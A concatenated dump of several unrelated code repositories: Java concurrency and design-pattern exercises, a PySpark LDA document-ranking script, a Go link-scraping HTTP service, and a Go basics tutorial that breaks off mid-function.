7、Total并不等于前三行数据相加,因为前三行的数据并不是在同一个请求中采集到的,所以Total是从整个请求所需要的时间的角度来统计的。</br>
</tr>
</table>
</div>
"""
return part_one_api_info + \
key_result_title + key_result_value + key_result_memo + \
response_pct_title + response_pct_value + response_pct_memo \
+ connect_time_title + connect_time_value + connect_time_memo
def get_report_file_list(cmd_str_list):
report_file_list = []
for cmd in cmd_str_list:
report_file_list.append(cmd.split("> ")[1].split("sleep")[0])
return report_file_list
def write_html(html_content):
# report_file_name="Daily_单接口压测报告_"+datetime.datetime.strftime(datetime.datetime.now(), 'z%Y%m%d%_H%M%S')+".html"
report_file_name = "Daily_单接口压测报告_" + time.strftime('%Y%m%d%H%M', time.localtime()) + ".html"
report_file_path = os.path.abspath(os.path.dirname(os.path.dirname(__file__))) + "/ReportFile/"
with open(report_file_path + report_file_name, 'w', encoding="utf-8") as file:
file.write(html_content)
# if __name__ == '__main__':
# HtmlReport.collect_date("/Users/panpan/Desktop/DDStudy/OcrDemo/1.txt",40)
# generate_report()
| 1006ddd4195c56e02bd87a94ae1270509d46ad12 | [
"Markdown",
"Python"
] | 4 | Python | Zekylly/ApacheBenchmarkAPITestTool | ab2bc884b20604f04e775ceb3b4ee4c16b617bd9 | 5335d54d2a477bcc90cc04e21cb676515b1cf54d |
refs/heads/master | <repo_name>thanq/javalearn<file_sep>/src/main/java/share/share_currency/Test.java
package share.share_currency;
import java.util.Hashtable;
import java.util.concurrent.ConcurrentHashMap;
/**
* Created by bricks on 2018/2/26.
*/
public class Test {
Hashtable<String,String> hashtable = new Hashtable<>();
ConcurrentHashMap<String,String> tmp = new ConcurrentHashMap<>();
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/thread/ThreadLocalTest.java
package concurrency.book.the_art_of_java_concurrency_programming.thread;
import java.util.concurrent.ConcurrentLinkedQueue;
/**
* Created by bricks on 2018/3/1.
*/
public class ThreadLocalTest {
ThreadLocal<Long> tmp = new ThreadLocal<>();
ConcurrentLinkedQueue tmp2 = new ConcurrentLinkedQueue();
}
<file_sep>/src/main/java/tmp/Tmp.java
package tmp;
import java.lang.instrument.Instrumentation;
/**
* Created by bricks on 2018/3/8.
*/
public class Tmp {
public static void main(String[] args){
Tmp tmp = new Tmp();
System.out.println();
}
}
<file_sep>/src/main/java/interview/module/produce_consume/block_queue/WaitNotifyModel.java
package interview.module.produce_consume.block_queue;
import interview.module.produce_consume.framework.*;
import java.util.LinkedList;
import java.util.Queue;
import java.util.concurrent.atomic.AtomicInteger;
/**
* Created by bricks on 2018/1/29.
*/
public class WaitNotifyModel implements Model{
private final Object BUFFER_LOCK = new Object();
private final Queue<Task> buffer = new LinkedList<>();
private int cap;
private final AtomicInteger increTaskNo = new AtomicInteger(0);
public WaitNotifyModel(int cap){
this.cap = cap;
}
@Override
public Runnable newRunnableConsumer(){
return new ConsumerImpl();
}
@Override
public Runnable newRunnableProducer(){
return new ProducerImpl();
}
private class ConsumerImpl extends AbstractConsumer implements Consumer,Runnable {
@Override
public void consume() throws InterruptedException {
synchronized (BUFFER_LOCK) {
while (buffer.size() == 0) {
System.out.println("consumer is waiting");
BUFFER_LOCK.wait();
}
Task task = buffer.poll();
assert task != null;
// Thread.sleep(5);
System.out.println("consume" + task.no);
BUFFER_LOCK.notifyAll();
}
}
}
private class ProducerImpl extends AbstractProducer implements Producer,Runnable {
@Override
public void produce() throws InterruptedException{
// Thread.sleep(2);
synchronized (BUFFER_LOCK){
while (buffer.size() == cap){
BUFFER_LOCK.wait();
}
Task task = new Task(increTaskNo.getAndIncrement());
buffer.offer(task);
System.out.println("produce: " + task.no);
BUFFER_LOCK.notifyAll();
System.out.println("produce notifyAll");
}
}
}
public static void main(String[] args){
Model model = new WaitNotifyModel(8);
for(int i = 0; i < 4; i++){
new Thread(model.newRunnableConsumer()).start();
}
for(int i = 0; i < 4; i++){
new Thread(model.newRunnableProducer()).start();
}
}
}
<file_sep>/src/main/java/interview/module/produce_consume/framework/Consumer.java
package interview.module.produce_consume.framework;
/**
* Created by bricks on 2018/1/28.
*/
public interface Consumer {
void consume() throws InterruptedException;
}<file_sep>/src/main/java/concurrency/hashmap/MulHashMap.java
package concurrency.hashmap;
import java.util.HashMap;
import java.util.Map;
import java.util.UUID;
/**
* Created by bricks on 2018/2/2.
*/
public class MulHashMap {
public static void main(String[] args) throws Exception{
final Map<String, String> test = new HashMap<>();
Thread tmp = new Thread(new Runnable() {
@Override
public void run(){
int counter= 0;
try {
Thread.sleep(1000);
}catch (Exception ex){
ex.printStackTrace();
}
System.out.println(counter++ + " 次遍历map");
for (Map.Entry<String, String> entry : test.entrySet()) {
if(counter > 12000){
System.out.println(counter);
break;
}
System.out.println(entry.getKey() + ":" + entry.getValue());
counter++;
}
}
},"test");
Thread t = new Thread(new Runnable() {
@Override
public void run() {
for (int i = 0; i < 10000; i++) {
new Thread(new Runnable() {
@Override
public void run() {
test.put(UUID.randomUUID().toString(), "");
}
}, "ftf" + i).start();
}
}
}, "ftf");
t.start();
t.join();
tmp.start();
}
}
<file_sep>/src/main/java/netty/learn/book/netty_authoritative_guide/nio_getting_start/bio/ClientThread.java
package netty.learn.book.netty_authoritative_guide.nio_getting_start.bio;
import java.io.BufferedReader;
import java.io.InputStreamReader;
import java.io.PrintWriter;
import java.net.Socket;
import java.util.concurrent.atomic.AtomicInteger;
/**
* Created by bricks on 2018/2/9.
*/
public class ClientThread implements Runnable{
private Socket socket;
private AtomicInteger counter;
public ClientThread(Socket socket,AtomicInteger counter){
this.socket = socket;
this.counter = counter;
}
@Override
public void run(){
BufferedReader in = null;
PrintWriter out = null;
try {
in = new BufferedReader(new InputStreamReader(
socket.getInputStream()
));
out = new PrintWriter(socket.getOutputStream(), true);
out.println("QUERY TIME ORDER");
System.out.println("send order "+ counter + "time server succeed.\n");
String resp = in.readLine();
System.out.println("Now is:" + resp);
}catch (Exception ex){
ex.printStackTrace();
}finally {
if(out != null){
out.close();
out = null;
}
if(in != null){
try {
in.close();
}catch (Exception inex){
inex.printStackTrace();
}
in = null;
}
if(socket != null){
try {
socket.close();
}catch (Exception ex){
ex.printStackTrace();
}
socket = null;
}
}
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/container_and_frame/fork_join/Fibonacci.java
package concurrency.book.the_art_of_java_concurrency_programming.container_and_frame.fork_join;
import java.util.concurrent.ForkJoinPool;
import java.util.concurrent.ForkJoinTask;
import java.util.concurrent.Future;
import java.util.concurrent.RecursiveTask;
/**
* Created by bricks on 2018/3/7.
*/
public class Fibonacci extends RecursiveTask<Integer>{
final int n;
Fibonacci(int n){
this.n = n;
}
private int compute(int small){
final int[] result = { 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89 };
return result[small];
}
@Override
public Integer compute(){
if(n <= 10){
return compute(n);
}
Fibonacci f1 = new Fibonacci(n - 1);
Fibonacci f2 = new Fibonacci(n - 2);
f1.fork();
f2.fork();
return f1.join() + f2.join();
}
public static void main(String[] args) throws Exception{
ForkJoinTask<Integer> fjt = new Fibonacci(44);
ForkJoinPool fjp = new ForkJoinPool();
Future<Integer> result = fjp.submit(fjt);
System.out.println(result.get());
}
}
<file_sep>/src/main/java/netty/learn/book/netty_authoritative_guide/nio_getting_start/bio/TimeCientThreadPool.java
package netty.learn.book.netty_authoritative_guide.nio_getting_start.bio;
import java.net.Socket;
import java.util.concurrent.ArrayBlockingQueue;
import java.util.concurrent.ThreadPoolExecutor;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;
/**
* Created by bricks on 2018/2/9.
*/
public class TimeCientThreadPool {
public static void main(String[] args) throws Exception {
AtomicInteger counter = new AtomicInteger(0);
int port = 8080;
if (args != null && args.length != 0) {
port = Integer.valueOf(args[0]);
}
ThreadPoolExecutor executor = new ThreadPoolExecutor(5, 10, 200, TimeUnit.MILLISECONDS,
new ArrayBlockingQueue<Runnable>(5));
while (true) {
counter.getAndIncrement();
Socket socket = null;
socket = new Socket("127.0.0.1", port);
if(executor.getQueue().size() > 3){
Thread.sleep(10);
}
ClientThread clientThread = new ClientThread(socket,counter);
executor.execute(clientThread);
}
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/tools/DemoExchange.java
package concurrency.book.the_art_of_java_concurrency_programming.tools;
import java.util.concurrent.Exchanger;
/**
* Created by bricks on 2018/3/8.
*/
public class DemoExchange {
private static final Exchanger<String> exchange = new Exchanger<>();
public static void main(String[] args){
new Thread(new Runnable() {
@Override
public void run() {
try{
String aData = "银行流水A";
String bData = exchange.exchange(aData);
System.out.println("thread-A获取到的B的数据:" + bData);
}catch (InterruptedException ex){
ex.printStackTrace();
}
}
}) .start();
new Thread(new Runnable() {
@Override
public void run() {
try {
String bData = "银行流水B";
String aData = exchange.exchange(bData);
System.out.println("thread-B获取到的A的数据:" + aData);
}catch (Exception ex){
ex.printStackTrace();
}
}
}).start();
}
}
<file_sep>/src/main/java/concurrency/ThreadDumpTest.java
package concurrency;
/**
* Created by bricks on 2018/1/25.
*/
public class ThreadDumpTest {
public void test(){
for (int i = 0; i < 8 ; i++) {
Thread th=new Thread(new TR(i));
th.setName("MyThread-"+(1000+i));
th.start();
}
}
public static void main(String[] args) {
ThreadDumpTest t=new ThreadDumpTest();
t.test();
}
private class TR implements Runnable{
int ins=0;
TR(int i){
ins=i;
}
public void run(){
while (true) {
}
}
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/thread/ThreadState.java
package concurrency.book.the_art_of_java_concurrency_programming.thread;
import sun.tools.jconsole.Worker;
/**
* Created by bricks on 2018/2/20.
*/
public class ThreadState {
public static void main(String[] args){
System.out.println("-----线程状态-----");
TimeWaiting timeWaiting = new TimeWaiting();
Waiting waiting = new Waiting();
Blocked blocked = new Blocked();
Blocked blocked1 = new Blocked();
Thread timeWaitingTh = new Thread(timeWaiting,"time_waiting====bricks");
Thread waitingTh = new Thread(waiting,"waiting===bricks");
Thread blockedTh = new Thread(blocked,"blocked===1-bricks");
Thread blocked1Th = new Thread(blocked1,"blocked===2-bricks");
timeWaitingTh.start();
waitingTh.start();
blockedTh.start();
blocked1Th.start();
}
static class TimeWaiting implements Runnable{
@Override
public void run(){
SleepUtil.sleepSeconds(100);
}
}
static class Waiting implements Runnable{
@Override
public void run(){
while(true) {
synchronized (Waiting.class) {
try {
Waiting.class.wait();
}catch (InterruptedException ex){
ex.printStackTrace();
}
}
}
}
}
static class Blocked implements Runnable{
@Override
public void run(){
while(true){
synchronized (Blocked.class){
SleepUtil.sleepSeconds(10);
}
}
}
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/tools/CountdownLatchDemo.java
package concurrency.book.the_art_of_java_concurrency_programming.tools;
import java.util.concurrent.CountDownLatch;
/**
* Created by bricks on 2018/3/8.
*/
public class CountdownLatchDemo {
private static final int THREAD_NUM = 30;
private static final CountDownLatch countdownLatch = new CountDownLatch(THREAD_NUM);
public static void main(String[] args) throws Exception{
for(int i = 0; i < THREAD_NUM; i++){
Thread tmp = new Thread(new DataCrawl(),"爬取线程-" + i);
tmp.start();
}
countdownLatch.await();
dataReport();
}
static class DataCrawl implements Runnable{
@Override
public void run(){
System.out.println(Thread.currentThread().getName() + " 开始爬取数据");
countdownLatch.countDown();
}
}
private static void dataReport(){
System.out.println("\n=====开始生成报表====");
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/thread/Interrupted.java
package concurrency.book.the_art_of_java_concurrency_programming.thread;
/**
* Created by bricks on 2018/2/26.
*/
public class Interrupted {
public static void main(String[] args){
Thread sleepRunner = new Thread(new SleepRunner(),"sleep-runner");
Thread busyRunner = new Thread(new BusyRunner(),"busy-runner");
// sleepRunner.setDaemon(true);
// busyRunner.setDaemon(true);
sleepRunner.start();
// busyRunner.start();
SleepUtil.sleepSeconds(4);
sleepRunner.interrupt();
// busyRunner.interrupt();
System.out.println("sleep-runner :" + sleepRunner.isInterrupted());
// System.out.println("busy-runner :" + busyRunner.isInterrupted());
SleepUtil.sleepSeconds(1);
}
static class SleepRunner implements Runnable{
private Integer counter = 0;
@Override
public void run(){
while(!Thread.currentThread().isInterrupted()) {
// while(true){
System.out.println(Thread.currentThread().isInterrupted());
SleepUtil.sleepSeconds(1);
System.out.println("第" + counter++ + "次sleep");
}
}
}
static class BusyRunner implements Runnable{
private Boolean afterInterrupted = false;
public void setAfterInterrupted(Boolean afterInterrupted){
this.afterInterrupted = afterInterrupted;
}
@Override
public void run(){
while (!Thread.currentThread().isInterrupted()){
if(afterInterrupted){
System.out.println("test");
}
}
}
}
}
<file_sep>/src/main/java/interview/designpattern/singleton/SingleTonInnerClass.java
package interview.designpattern.singleton;
import java.io.ObjectStreamException;
/**
* Created by bricks on 2018/1/28.
*/
/*
静态内部类虽然保证了单例在多线程并发下的线程安全性,但是在遇到序列化对象时,默认的方式运行得到的结果就是多例的。
*/
public class SingleTonInnerClass {
private static class MySingletonHandler{
private static SingleTonInnerClass instance = new SingleTonInnerClass();
}
private SingleTonInnerClass(){}
public static SingleTonInnerClass getInstance(){
return MySingletonHandler.instance;
}
//该方法在反序列化时会被调用,该方法不是接口定义的方法,有点儿约定俗成的感觉
protected Object readResolve() throws ObjectStreamException {
System.out.println("调用了readResolve方法!");
return MySingletonHandler.instance;
}
}
<file_sep>/src/main/java/test/reflect/dynami_loading/OfficeAble.java
package test.reflect.dynami_loading;
/**
* Created by bricks on 17/7/16.
*/
interface OfficeAble {
public void start();
}
<file_sep>/src/main/java/interview/designpattern/singleton/ThreadCheck.java
package interview.designpattern.singleton;
/**
* Created by bricks on 2018/1/28.
*/
public class ThreadCheck extends Thread{
@Override
public void run(){
System.out.println(SingleTonDCL.getInstance().hashCode());
}
public static void main(String[] args){
ThreadCheck[] chk = new ThreadCheck[10];
for(int i = 0; i < chk.length; i++){
chk[i] = new ThreadCheck();
}
for(int i = 0; i < chk.length; i++){
chk[i].start();
}
}
}
<file_sep>/src/main/java/test/reflect/dynami_loading/Word.java
package test.reflect.dynami_loading;
/**
* Created by bricks on 17/7/16.
*/
public class Word implements OfficeAble{
public void start() {
System.out.println("word start----");
}
}
<file_sep>/src/main/java/tmp/DoubleTest.java
package tmp;
/**
* Created by bricks on 2018/1/17.
*/
public class DoubleTest {
public static void main(String[] args){
Double bid = new Double("2.3");
bid = bid * 100;
System.out.println(bid);
String bidFormated = String.format("%.0f",bid);
bid = new Double(bidFormated);
System.out.println(bid);
System.out.println(3*0.1 == 0.3);
System.out.println(2*0.1 == 0.2);
System.out.println(25*0.1 == 2.5);
String tmp = "30000.0";
System.out.println("------");
String[] ee = tmp.split("\\.");
for(int i = 0; i < ee.length;i++){
System.out.println(ee[i]);
}
System.out.println("------");
System.out.println(tmp);
Double eee = new Double("9.0E-4");
System.out.println(eee);
System.out.println(eee*100);
}
}<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/thread/Shutdown.java
package concurrency.book.the_art_of_java_concurrency_programming.thread;
/**
* Created by bricks on 2018/2/26.
*/
public class Shutdown {
public static void main(String[] args){
}
static class Runner implements Runnable{
private volatile Integer counter = 0;
@Override
public void run(){
while(true){
counter++;
}
}
}
}
<file_sep>/src/main/java/test/reflect/use_of_class/ClassUtil.java
package test.reflect.use_of_class;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
/**
* Created by bricks on 17/7/16.
*/
public class ClassUtil {
public static void printClassMessage(Object obj) throws Exception{
Class c1 = obj.getClass();
System.out.println("类名称:" + c1.getName());
Method[] methods = c1.getMethods();
for(Method item : methods){
String methodName = item.getName();
Class returnType = item.getReturnType();
Class[] paramsList = item.getParameterTypes();
System.out.print(returnType + " " + methodName + "(");
for(Class paramTmp : paramsList){
System.out.print(paramTmp.getName() + ",");
}
System.out.print(")" + "\n");
}
System.out.println("-------------------获取成员变量信息");
Field[] fs = c1.getDeclaredFields();
for(Field field:fs){
Class fieldType = field.getType();
String typeName = fieldType.getTypeName();
String fieldName = field.getName();
System.out.println(typeName + " " +fieldName);
}
System.out.println("-------------------获取构造函数信息");
Constructor[] cs = c1.getDeclaredConstructors();
for(Constructor constructor:cs){
String csName = constructor.getName();
Class[] paramsList = constructor.getParameterTypes();
System.out.print(csName + "(");
for(Class params:paramsList){
System.out.print(params.getName());
}
System.out.println(")\n");
}
}
}
<file_sep>/src/main/java/concurrency/book/the_art_of_java_concurrency_programming/tools/DemoCyclicBarrierInterrupt.java
package concurrency.book.the_art_of_java_concurrency_programming.tools;
import java.util.concurrent.CyclicBarrier;
/**
* Created by bricks on 2018/3/8.
*/
public class DemoCyclicBarrierInterrupt {
static CyclicBarrier cyclicBarrier = new CyclicBarrier(2);
public static void main(String[] args) throws Exception{
Thread thread = new Thread(new Runnable() {
@Override
public void run() {
try {
cyclicBarrier.await();
Thread.sleep(200);
}catch (Exception ex){
ex.printStackTrace();
}
}
});
thread.start();
thread.interrupt();
Thread.sleep(200);
try{
cyclicBarrier.await();
}catch (Exception ex){
ex.printStackTrace();
System.out.println(cyclicBarrier.isBroken());
}
}
}
| 86a8f8d75f7b684b5ae669c7763ad97392f620db | [
"Java"
] | 22 | Java | thanq/javalearn | ca9d65f7eb6351ee837a46112a70e16dc425e37d | 9a248c70604d928348ea9a53fd7485f76b832244 |
refs/heads/master | <file_sep># -*- coding: utf-8 -*-
"""
Created on Tue May 8 06:34:07 2018
@author: logaprakash
"""
from collections import defaultdict
from pyspark import SparkContext
from pyspark.mllib.linalg import Vectors
from pyspark.mllib.clustering import LDA
from pyspark.sql import SQLContext
import re
import numpy as np
import csv
from time import time
a = time()
def document_vector(document):
id = document[1]
counts = defaultdict(int)
for token in document[0]:
if token in vocabulary:
token_id = vocabulary[token]
counts[token_id] += 1
counts = sorted(counts.items())
keys = [x[0] for x in counts]
values = [x[1] for x in counts]
return (id, Vectors.sparse(len(vocabulary), keys, values))
sc = SparkContext('local', 'PySPARK LDA')
sql_context = SQLContext(sc)
data = sc.wholeTextFiles('/home/sakshi/Documents/big_data/data/*').map(lambda x: x[1])
num_of_stop_words = 50
num_topics = 15
num_words_per_topic = 100
max_iterations = 35
tokens = data \
.map( lambda document: document.strip().lower()) \
.map( lambda document: re.split("[\s;,#]", document)) \
.map( lambda word: [x for x in word if x.isalpha()]) \
.map( lambda word: [x for x in word if len(x) > 3] )
termCounts = tokens \
.flatMap(lambda document: document) \
.map(lambda word: (word, 1)) \
.reduceByKey( lambda x,y: x + y) \
.map(lambda tuple: (tuple[1], tuple[0])) \
.sortByKey(False)
threshold_value = termCounts.take(num_of_stop_words)[num_of_stop_words - 1][0]
vocabulary = termCounts \
.filter(lambda x : x[0] < threshold_value) \
.map(lambda x: x[1]) \
.zipWithIndex() \
.collectAsMap()
documents = tokens.zipWithIndex().map(document_vector).map(list)
#inv_voc = {value: key for (key, value) in vocabulary.items()}
lda_model = LDA.train(documents, k=num_topics, maxIterations=max_iterations)
topic_indices = lda_model.describeTopics(maxTermsPerTopic=num_words_per_topic)
topic_document_matrix = lda_model.topicsMatrix()
document_data_df = documents.map(lambda x: (x[0], x[1])).toDF(("DocID","Word_Counts"))
word_data = document_data_df.select('Word_Counts').rdd.map(lambda x: x[0])
"""
Vectorizing
"""
document_data_list = word_data.collect()
num_docs = len(document_data_list)
vocab_len = len(vocabulary)
vectors = np.zeros((num_docs,num_topics))
for document in range(0,num_docs):
for topic in range(0,num_topics):
for word in range(0,vocab_len):
if document_data_list[document][word] != 0.0:
vectors[document][topic] += document_data_list[document][word] * topic_document_matrix[word][topic]
"""
Saving required frames
"""
np.savetxt("/home/sakshi/Documents/big_data/vectors.csv", vectors, delimiter=",")
np.savetxt("/home/sakshi/Documents/big_data/topic_word_matrix.csv", topic_document_matrix, delimiter=",")
with open('/home/sakshi/Documents/big_data/vocabulary.csv', 'w') as f: # Just use 'w' mode in 3.x
w = csv.DictWriter(f, vocabulary.keys())
w.writeheader()
w.writerow(vocabulary)
"""
Ending session
"""
sc.stop()
b = time() -a<file_sep>#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed May 9 19:21:22 2018
@author: sakshi
"""
from collections import defaultdict
from pyspark.mllib.linalg import Vectors
import numpy as np
import csv
import glob
from time import time
import os
import subprocess as sb
def document_vector(document):
id = document[1]
counts = defaultdict(int)
for token in document.split(' '):
if token in vocabulary:
token_id = vocabulary[token]
counts[token_id] += 1
counts = sorted(counts.items())
keys = [x[0] for x in counts]
values = [x[1] for x in counts]
return (id, Vectors.sparse(len(vocabulary), keys, values))
def getQueryVector(query):
query_word_count = document_vector(query.lower())
query_list = list(query_word_count)[1]
query_vector = np.zeros((num_topics))
for topic in range(0,num_topics):
for word in range(0,vocab_len):
if query_list[word] != 0.0:
query_vector[topic] += query_list[word] * topic_word_matrix[word][topic]
return query_vector
def nMostSimilarDocuments(query_vector_arg,no_of_results_arg):
dist_matrix = np.zeros((num_docs,num_topics))
for dist_index in range(num_docs):
dist_matrix[dist_index] = vectors[dist_index] - query_vector_arg
distances = np.sum(dist_matrix**2, axis=1)
return distances.argsort()[:no_of_results_arg]
def readFileLocations(path):
file_paths = []
files = glob.glob(path)
for element in files:
file_paths.append(element)
return file_paths
def displayResultPaths(result_data):
print("The recommendations are...\n")
result_paths = []
for result in result_data:
result_paths.append(file_paths[result])
print(file_paths[result])
return result_paths
def openResultsGedit(result_paths):
for path in result_paths:
proc = sb.Popen(['gedit', path])
proc.wait()
"""
Reading model data
"""
dict_reader = csv.DictReader(open('/home/sakshi/Documents/big_data/vocabulary.csv', 'r'))
vocabulary = []
for line in dict_reader:
vocabulary.append(line)
vocabulary = vocabulary[0]
vectors = np.genfromtxt('/home/sakshi/Documents/big_data/vectors.csv', delimiter=',')
vectors = vectors/np.amax(vectors)
topic_word_matrix = np.genfromtxt('/home/sakshi/Documents/big_data/topic_word_matrix.csv', delimiter=',')
"""
Declaring variables
"""
num_docs = vectors.shape[0]
num_topics = topic_word_matrix.shape[1]
vocab_len = len(vocabulary)
no_of_results = 3
path = '/home/sakshi/Documents/big_data/data/*/*'
file_paths = readFileLocations(path)
"""
Main program
"""
query = input("Enter the query:\n")
query_vec = getQueryVector(query)
#query_vec = query_vec/max(query_vec)
results = nMostSimilarDocuments(query_vec,no_of_results)
#print(results)
result_paths = displayResultPaths(results)
openResultsGedit(result_paths)
<file_sep># Ranking-MRF
Ranking of documents using Markov Random Field
| 71c59411770a7d9a711fcab13ef0c748b7c962e1 | [
"Markdown",
"Python"
] | 3 | Python | logaprakash/Ranking-MRF | f255d5c52652420e4fc04f484b305163b15ce1f5 | 3f073b4a2f9ed0e488ed8dce3d1b777a8ac56ed3 |
refs/heads/master | <repo_name>Bakalavr113/sample<file_sep>/app/controllers/users_controller.rb
# Handles user CRUD plus a minimal login flow.
#
# SECURITY(review): passwords are stored and compared in plain text via
# find_by — use has_secure_password / bcrypt instead.
class UsersController < ApplicationController
  def new
    @user = User.new
  end

  def create
    @user = User.new(users_params)
    if @user.save
      # BUG FIX: was `redirect_to_root_path` (an undefined method);
      # the route helper must be passed as an argument to redirect_to.
      redirect_to root_path
    end
  end

  def login
    @user = User.new
  end

  def result
    @user = User.find_by(email: params[:user][:email], password: params[:user][:password])
    if @user
      redirect_to user_path(@user.id)
    else
      # Guard against nil: previously a failed login crashed on @user.id.
      flash[:danger] = "Invalid email/password combination"
      redirect_to root_path
    end
  end

  def show
    @user = User.find(params[:id])
  end

  def edit
    @user = User.find(params[:id])
  end

  def update
    @user = User.find(params[:id])
    @user.update(users_params)
    if @user.save
      redirect_to user_path(@user.id)
    end
  end

  def destroy
    User.find(params[:id]).destroy
    flash[:success] = "User deleted"
    redirect_to root_path
  end

  private

  # Strong parameters for user creation/update.
  def users_params
    params.require(:user).permit(:firstname, :lastname, :email, :password)
  end
end
| f925133774e6b6ba194cefc423cb213a28ea3a24 | [
"Ruby"
] | 1 | Ruby | Bakalavr113/sample | 7086e3c815460d567dee12b55b96ac1f42ce3145 | 98b1727ae8e73b1134ac672da0a1caaf888d7a93 |
refs/heads/master | <file_sep>package main
//
//
// Go web scraper
// 0.0.1
//
//
// Usage: go run scraper.go
// curl -s 127.0.0.1:7171/search?url=<URL>
import (
"encoding/json"
"log"
"net/http"
"time"
"github.com/gocolly/colly"
)
var startTime time.Time
// ping is a trivial health-check handler: it logs the hit and echoes
// the literal body "ping".
func ping(w http.ResponseWriter, r *http.Request) {
	log.Println("Ping")
	body := []byte("ping")
	w.Write(body)
}
// scraper wires up the HTTP endpoints (/ping and /search) and serves
// them on port 7171. Blocks forever; log.Fatal exits on listen error.
func scraper() {
	addr := ":7171"
	// Endpoints
	http.HandleFunc("/ping", ping)
	http.HandleFunc("/search", getData)
	log.Println("listening on", addr)
	log.Fatal(http.ListenAndServe(addr, nil))
}
// getData handles /search requests: it scrapes every absolute link
// (<a href>) from the page named by the "url" query parameter and
// returns them as a JSON array.
func getData(w http.ResponseWriter, r *http.Request) {
	// Use a per-request start time instead of the shared package-level
	// startTime: handlers run concurrently, so writing that global was a
	// data race and produced wrong timings under load.
	start := time.Now()

	// Verify that the URL param exists; tell the client when it doesn't
	// (the original silently returned an empty 200).
	URL := r.URL.Query().Get("url")
	if URL == "" {
		log.Println("Missing URL..")
		http.Error(w, "missing url parameter", http.StatusBadRequest)
		return
	}
	log.Println("visiting", URL)

	// Create a collector that will handle the data collection from HTML.
	c := colly.NewCollector()
	var response []string
	// OnHTML registers a callback fired for each matching element; every
	// non-empty absolute link is collected into `response`.
	c.OnHTML("a[href]", func(e *colly.HTMLElement) {
		link := e.Request.AbsoluteURL(e.Attr("href"))
		if link != "" {
			response = append(response, link)
		}
	})
	// Visit URL (synchronous: callbacks have run once this returns).
	c.Visit(URL)

	// Serialize the collected links to JSON.
	b, err := json.Marshal(response)
	if err != nil {
		log.Println("failed to serialize response:", err)
		http.Error(w, "failed to serialize response", http.StatusInternalServerError)
		return
	}
	// Add a header and write the body to the endpoint.
	w.Header().Add("Content-Type", "application/json")
	w.Write(b)

	log.Printf("Scraped in %v", time.Since(start))
}
<file_sep>package basics
import (
"fmt"
"strings"
"sync"
)
// Person is a simple demo record: a name plus an age in years.
type Person struct {
	Name string
	Age  int
}

// Print writes the receiver to stdout, preceded by a newline.
func (k Person) Print() {
	fmt.Println("\n", k)
}

// PrintPerson constructs a Person from its fields and prints it.
// Capital P is syntax, not style, and needed to make the function exported (public)
func PrintPerson(name string, age int) {
	p := Person{Name: name, Age: age}
	p.Print()
}
// SOURCE: <NAME> - Golang in under an hour (2021) https://www.youtube.com/watch?v=N0fIANJkwic
// LOOPS
// Each demo function in this file chains into the next one, so calling
// ForLoop() runs the whole tutorial sequence.

// REGULAR FOR LOOP
// ForLoop counts to 5 with a classic three-clause for loop.
func ForLoop() {
	var sum int
	fmt.Println(sum)
	for i := 0; i < 5; i++ {
		sum++
		fmt.Println(sum)
	}
	infiniteForLoop()
}

// INFINITE FOR LOOP
// infiniteForLoop shows a condition-less for loop terminated by break.
func infiniteForLoop() {
	fmt.Println("Infinite for loop (with break): ")
	sum := 0
	fmt.Printf("Sum: %v", sum)
	for {
		sum++ // Goes on forever
		fmt.Printf("Sum: %v", sum)
		if sum == 10 {
			fmt.Println("Break!")
			break // Breaks at 10
		}
	}
	whileLoop()
}

// WHILE LOOP
// whileLoop emulates a while loop using a single-condition for loop.
func whileLoop() {
	// Go does not have while loops, instead you use for loop
	fmt.Println("This is a 'while' loop: n = 0")
	n := 0
	for n < 5 {
		n++
		fmt.Printf("'While' loop n = %v", n)
	}
	arrayInt()
}
// Arrays
// arrayInt contrasts a zero-valued array with a literal one.
// NOTE(review): `b` is mutated but never printed; it only demonstrates
// element assignment.
func arrayInt() {
	var a [5]int // This will be 0, 0, 0, 0, 0
	b := [5]int{10, 20, 30, 40, 50}
	b[1] = 25
	fmt.Println("a", a)
	sliceInt()
}

// Slices are dynamically sized arrays - like C# lists
func sliceInt() {
	// Slices seems to be similar to lists in C#
	var c []int // An array without defined size is a slice
	fmt.Println("c empty: ", c)
	c = []int{10, 20, 30, 40}
	fmt.Println("c not empty: ", c)
	// Slices can also be short-hand initialized
	d := []int{10, 20, 30, 40, 50}
	fmt.Println("d: ", d)
	// Slices can also be initialized like this:
	s := make([]int, 4)
	// Append takes one slice as an argument, and the elements.
	// NOTE(review): make([]int, 4) already created four zero elements, so
	// the appended values land at indices 4 and 5.
	s = append(s, 60, 70)
	fmt.Println("s: ", s)
	// Manipulate the slice
	// This makes the index 2 (third element) in the slice equal to
	// the index in s where the element at the index of the length of the slice
	// (last element + 1(out of bounds)) - 1. Which is the last element.
	s[2] = s[len(s)-1]
	fmt.Println("s(3-5)", s[2:5]) // Print the 3rd to the 5th element (indices 2..4)
	// Range
	// Iterate through s
	// k is key, v is value
	// key is index
	// printing each key in each value
	for k, v := range s {
		fmt.Printf("%d is %d\n", k, v)
	}
	mapExample()
}

// MAPS
// Seems to be similar to dicts in C#
var sampleMap map[string]int

// mapExample demonstrates map literals, insert, delete, overwrite, and
// both key/value and key-only iteration.
func mapExample() {
	sampleMap = map[string]int{
		"Bob":   30,
		"Kevin": 24,
	}
	// Adding to the map
	sampleMap["Another person"] = 42
	currency := map[string]string{
		"NOK": "Norwegian Krone",
		"EUR": "Euro",
		"USD": "USA Dolar",
	}
	currency["GBP"] = "Great Britain Pound"
	fmt.Println("Currency GBP added to the map: ", currency)
	// Remove from the map
	delete(currency, "GBP")
	fmt.Println("Currency GBP deleted from the map: ", currency)
	// Replacing a value in the map.
	// NOTE(review): this sets EUR's *value* to "Norwegian Krone" — it does
	// not touch the NOK entry.
	currency["EUR"] = "Norwegian Krone"
